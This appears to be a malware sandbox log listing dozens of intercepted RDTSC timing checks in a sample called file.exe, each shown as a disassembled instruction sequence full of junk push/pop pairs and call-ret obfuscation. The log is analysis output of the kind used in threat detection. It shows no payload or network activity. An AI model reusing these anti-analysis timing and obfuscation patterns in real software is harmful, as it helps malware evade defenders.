Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9109AE second address: 9109B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push edi 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9109B7 second address: 9109C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FE83906A386h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 910B11 second address: 910B2E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE839054489h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 910B2E second address: 910B34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 910B34 second address: 910B3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FE839054476h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 910B3E second address: 910B61 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE83906A395h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jnl 00007FE83906A386h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 910CAE second address: 910CB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edi 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 910CB5 second address: 910CC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jc 00007FE83906A386h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 910CC1 second address: 910CD9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE839054484h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 91438C second address: 9143CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push esi 0x0000000b push eax 0x0000000c push esi 0x0000000d pop esi 0x0000000e pop eax 0x0000000f pop esi 0x00000010 mov eax, dword ptr [eax] 0x00000012 pushad 0x00000013 jp 00007FE83906A392h 0x00000019 pushad 0x0000001a pushad 0x0000001b popad 0x0000001c jno 00007FE83906A386h 0x00000022 popad 0x00000023 popad 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 push eax 0x00000029 push edx 0x0000002a jbe 00007FE83906A38Ch 0x00000030 js 00007FE83906A386h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9143CE second address: 9143D3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9143D3 second address: 7A19FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop eax 0x00000008 mov dword ptr [ebp+122D2544h], esi 0x0000000e je 00007FE83906A38Ch 0x00000014 mov esi, dword ptr [ebp+122D2AAFh] 0x0000001a push dword ptr [ebp+122D0D8Dh] 0x00000020 mov dword ptr [ebp+122D2344h], eax 0x00000026 call dword ptr [ebp+122D1F76h] 0x0000002c pushad 0x0000002d mov dword ptr [ebp+122D2373h], esi 0x00000033 xor eax, eax 0x00000035 cmc 0x00000036 mov edx, dword ptr [esp+28h] 0x0000003a js 00007FE83906A38Ch 0x00000040 xor dword ptr [ebp+122D2594h], eax 0x00000046 add dword ptr [ebp+122D2594h], ecx 0x0000004c mov dword ptr [ebp+122D2CC7h], eax 0x00000052 jmp 00007FE83906A38Fh 0x00000057 add dword ptr [ebp+122D2594h], eax 0x0000005d mov esi, 0000003Ch 0x00000062 mov dword ptr [ebp+122D354Ah], ecx 0x00000068 pushad 0x00000069 add bh, 00000056h 0x0000006c jmp 00007FE83906A392h 0x00000071 popad 0x00000072 add esi, dword ptr [esp+24h] 0x00000076 mov dword ptr [ebp+122D354Ah], esi 0x0000007c lodsw 0x0000007e jmp 00007FE83906A396h 0x00000083 add eax, dword ptr [esp+24h] 0x00000087 stc 0x00000088 jmp 00007FE83906A38Ch 0x0000008d mov ebx, dword ptr [esp+24h] 0x00000091 sub dword ptr [ebp+122D2373h], edi 0x00000097 nop 0x00000098 jl 00007FE83906A394h 0x0000009e push eax 0x0000009f push eax 0x000000a0 push edx 0x000000a1 jmp 00007FE83906A391h 0x000000a6 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 914464 second address: 914468 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 914468 second address: 9144F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FE83906A38Ch 0x0000000c popad 0x0000000d add dword ptr [esp], 5B68C300h 0x00000014 xor ch, 0000004Eh 0x00000017 push 00000003h 0x00000019 mov dword ptr [ebp+122D2544h], edi 0x0000001f push 00000000h 0x00000021 jmp 00007FE83906A38Bh 0x00000026 push 00000003h 0x00000028 pushad 0x00000029 mov dx, ax 0x0000002c mov esi, 745B9ED4h 0x00000031 popad 0x00000032 push B7A096EEh 0x00000037 push esi 0x00000038 jo 00007FE83906A388h 0x0000003e pushad 0x0000003f popad 0x00000040 pop esi 0x00000041 xor dword ptr [esp], 77A096EEh 0x00000048 lea ebx, dword ptr [ebp+124462C0h] 0x0000004e push 00000000h 0x00000050 push ebp 0x00000051 call 00007FE83906A388h 0x00000056 pop ebp 0x00000057 mov dword ptr [esp+04h], ebp 0x0000005b add dword ptr [esp+04h], 0000001Dh 0x00000063 inc ebp 0x00000064 push ebp 0x00000065 ret 0x00000066 pop ebp 0x00000067 ret 0x00000068 mov dx, bx 0x0000006b xchg eax, ebx 0x0000006c js 00007FE83906A392h 0x00000072 jc 00007FE83906A38Ch 0x00000078 push eax 0x00000079 push edx 0x0000007a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 914578 second address: 91457C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 91457C second address: 914609 instructions: 0x00000000 rdtsc 0x00000002 js 00007FE83906A386h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FE83906A393h 0x0000000f popad 0x00000010 add dword ptr [esp], 405EAED8h 0x00000017 mov dword ptr [ebp+122D232Ch], ebx 0x0000001d push 00000003h 0x0000001f mov dh, 03h 0x00000021 push 00000000h 0x00000023 sub dword ptr [ebp+122D1C0Eh], edx 0x00000029 push 00000003h 0x0000002b jmp 00007FE83906A38Ah 0x00000030 push 92D4FCA1h 0x00000035 jmp 00007FE83906A399h 0x0000003a xor dword ptr [esp], 52D4FCA1h 0x00000041 movsx edx, cx 0x00000044 lea ebx, dword ptr [ebp+124462C9h] 0x0000004a jmp 00007FE83906A395h 0x0000004f xchg eax, ebx 0x00000050 push eax 0x00000051 push edx 0x00000052 push edi 0x00000053 push ecx 0x00000054 pop ecx 0x00000055 pop edi 0x00000056 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 914609 second address: 91460F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 91460F second address: 914624 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jnc 00007FE83906A388h 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 91469C second address: 9146E2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007FE839054478h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 00000018h 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 movsx esi, cx 0x00000028 push 00000000h 0x0000002a mov edi, dword ptr [ebp+122D29C7h] 0x00000030 xor dx, 8BB3h 0x00000035 push FC622B28h 0x0000003a push edx 0x0000003b pushad 0x0000003c push esi 0x0000003d pop esi 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9146E2 second address: 914747 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 add dword ptr [esp], 039DD558h 0x0000000d and esi, dword ptr [ebp+122D1F2Fh] 0x00000013 push 00000003h 0x00000015 pushad 0x00000016 mov dword ptr [ebp+122D2311h], ebx 0x0000001c mov dword ptr [ebp+122D1CECh], esi 0x00000022 popad 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push ebp 0x00000028 call 00007FE83906A388h 0x0000002d pop ebp 0x0000002e mov dword ptr [esp+04h], ebp 0x00000032 add dword ptr [esp+04h], 00000018h 0x0000003a inc ebp 0x0000003b push ebp 0x0000003c ret 0x0000003d pop ebp 0x0000003e ret 0x0000003f mov dword ptr [ebp+122D3337h], esi 0x00000045 push 00000003h 0x00000047 jns 00007FE83906A38Ah 0x0000004d call 00007FE83906A389h 0x00000052 push edx 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 914747 second address: 91474B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 91474B second address: 91474F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 91474F second address: 914765 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FE83905447Ch 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 914765 second address: 91476C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 91476C second address: 914797 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jnp 00007FE83905448Eh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 914797 second address: 9147DC instructions: 0x00000000 rdtsc 0x00000002 jne 00007FE83906A395h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c jmp 00007FE83906A392h 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a jmp 00007FE83906A38Eh 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9147DC second address: 914831 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FE839054478h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push 00000000h 0x0000000d push ecx 0x0000000e call 00007FE839054478h 0x00000013 pop ecx 0x00000014 mov dword ptr [esp+04h], ecx 0x00000018 add dword ptr [esp+04h], 0000001Ch 0x00000020 inc ecx 0x00000021 push ecx 0x00000022 ret 0x00000023 pop ecx 0x00000024 ret 0x00000025 mov dx, 9E87h 0x00000029 jnl 00007FE83905447Ch 0x0000002f lea ebx, dword ptr [ebp+124462D4h] 0x00000035 or dword ptr [ebp+122D1DBCh], eax 0x0000003b push eax 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f pushad 0x00000040 popad 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 914831 second address: 914836 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 926719 second address: 926722 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 933558 second address: 933579 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FE83906A394h 0x00000008 jmp 00007FE83906A38Ch 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 jc 00007FE83906A38Ch 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 933579 second address: 933587 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 jbe 00007FE839054476h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9336FE second address: 933702 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 933702 second address: 933725 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jg 00007FE83905447Ah 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FE83905447Fh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 933725 second address: 933729 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9339E6 second address: 9339F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FE839054476h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 933D22 second address: 933D2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FE83906A386h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 933D2C second address: 933D6C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE83905447Bh 0x00000007 jmp 00007FE839054486h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jmp 00007FE839054487h 0x00000014 pushad 0x00000015 popad 0x00000016 pop eax 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9342E8 second address: 93431B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jc 00007FE83906A386h 0x0000000b jno 00007FE83906A386h 0x00000011 jmp 00007FE83906A392h 0x00000016 popad 0x00000017 push ecx 0x00000018 pushad 0x00000019 popad 0x0000001a pop ecx 0x0000001b pop edx 0x0000001c pop eax 0x0000001d ja 00007FE83906A396h 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93431B second address: 934323 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93447F second address: 9344A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE83906A398h 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE83906A38Ah 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 934608 second address: 934612 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FE839054476h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92BF7F second address: 92BF99 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE83906A390h 0x00000007 je 00007FE83906A392h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 934D53 second address: 934D59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 934D59 second address: 934D5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 934EB2 second address: 934ED5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 jl 00007FE8390544A4h 0x0000000d push eax 0x0000000e push edx 0x0000000f jne 00007FE839054476h 0x00000015 jmp 00007FE83905447Eh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93506E second address: 93507A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FE83906A386h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9354D9 second address: 9354E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9354E7 second address: 9354EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9354EB second address: 9354FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE83905447Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 939BB3 second address: 939BBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FE83906A386h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 939BBF second address: 939BC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 939BC7 second address: 939BFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE83906A392h 0x00000009 jmp 00007FE83906A38Ch 0x0000000e jmp 00007FE83906A390h 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 939BFA second address: 939C02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 939C02 second address: 939C06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 939C06 second address: 939C35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FE839054489h 0x0000000d jmp 00007FE83905447Eh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 939C35 second address: 939C5E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE83906A398h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 je 00007FE83906A386h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 939C5E second address: 939C79 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jmp 00007FE83905447Dh 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 939C79 second address: 939C7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93BE3B second address: 93BE40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93D709 second address: 93D718 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop edi 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93D718 second address: 93D76E instructions: 0x00000000 rdtsc 0x00000002 jne 00007FE839054478h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push edx 0x0000000f push esi 0x00000010 jmp 00007FE839054484h 0x00000015 pop esi 0x00000016 pop edx 0x00000017 mov eax, dword ptr [eax] 0x00000019 pushad 0x0000001a jmp 00007FE83905447Bh 0x0000001f jmp 00007FE839054486h 0x00000024 popad 0x00000025 mov dword ptr [esp+04h], eax 0x00000029 push edi 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93D76E second address: 93D772 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94155D second address: 941561 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 900387 second address: 90038D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90038D second address: 900391 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 900391 second address: 900397 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 900397 second address: 9003A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FE839054476h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9003A1 second address: 9003A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 940E94 second address: 940EAA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 pushad 0x00000008 push esi 0x00000009 push eax 0x0000000a pop eax 0x0000000b pushad 0x0000000c popad 0x0000000d pop esi 0x0000000e jc 00007FE83905447Eh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94124D second address: 94125A instructions: 0x00000000 rdtsc 0x00000002 jp 00007FE83906A386h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94125A second address: 941261 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ecx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9413AA second address: 9413B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9413B0 second address: 941400 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 pushad 0x00000007 popad 0x00000008 pop esi 0x00000009 jnp 00007FE83905447Ch 0x0000000f popad 0x00000010 pushad 0x00000011 push ebx 0x00000012 jg 00007FE839054476h 0x00000018 pop ebx 0x00000019 jns 00007FE83905449Eh 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 943F9D second address: 943FA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 943FA1 second address: 943FA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 943FFD second address: 944002 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94419E second address: 9441A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FE839054476h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9441A8 second address: 9441AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9441AC second address: 9441BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
